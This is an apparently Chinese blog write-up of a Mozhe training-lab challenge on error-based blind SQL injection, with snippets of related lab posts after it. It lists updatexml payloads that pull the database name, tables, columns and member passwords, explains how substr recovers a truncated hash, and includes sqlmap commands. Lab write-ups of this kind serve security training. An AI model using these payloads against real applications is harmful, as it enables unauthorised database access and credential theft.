墨者 SQL注入漏洞測試 報錯盲注

2021-09-25 01:53:53 字數 1767 閱讀 6995

根據題意,用updatexml構造報錯回顯 ' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

爆庫  ' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

爆表 ' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'stormgroup' limit 0,1),0x7e),1)--+ 

爆欄位 ' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'stormgroup' and table_name = 'member'),0x7e),1)--+

爆字段值 

' and updatexml(1,concat(0x7e,(select name from member limit 0,1),0x7e),1)--+

' and updatexml(1,concat(0x7e,(select name from member limit 1,1),0x7e),1)--+

' and updatexml(1,concat(0x7e,(select password from member limit 0,1),0x7e),1)--+

' and updatexml(1,concat(0x7e,(select password from member limit 1,1),0x7e),1)--+

乙個乙個爆出來即可

爆到這裡有個坑點,例如上圖,按照正常來說的回顯應該是 「~密碼~ 」 這樣的形式的

但是這裡結尾卻沒有~了,報錯長度32位,~符號占用了1位,所以密碼只有31位

果然直接拿這個密碼去md5解密,直接解釋失敗

根據題目提示,要用到substr函式,所以直接把被吞的最後一位單獨截出來

直接拼接

登入成功 

WEB安全 SQL注入漏洞測試 報錯盲注

前言 目前鑽研sqli注入,這是第四篇,靶場名即為標題,鏈結如下 正文首先明確靶場為報錯注入,了解到目標,方便我們之後遇到問題有底,這裡截斷函式不知道,接下來就會遇到問題 進入靶場,環境和之前一樣,進入公告 之後按照流程,判斷出是單引號閉合,同時判斷出有四個回顯位,但是當我們準備判斷哪個是回顯位的時...

SQL注入漏洞測試 布林盲注

停機維護通知發現注入點 sqlmap u current db 獲取到的資料庫名是stormgroup sqlmap u d stormgroup tables 獲取到的表是member和notice sqlmap u d stormgroup t member columns 獲取到的列名分別是 ...

墨者 SQL注入漏洞測試 delete注入

測試注入 嘗試order by 失敗 測試and,頁面正常回顯 試著用報錯注入,and updatexml 1,concat 0x7e,select database 0x7e 1 發現有注入點,資料庫是pikaqiu 在這裡提醒大家不要用id 61 65進行注入,構造乙個不存在的最好 如博主用的是...